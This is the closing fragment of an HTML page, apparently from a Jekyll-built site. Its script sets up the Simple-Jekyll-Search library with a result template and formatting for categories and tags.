  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

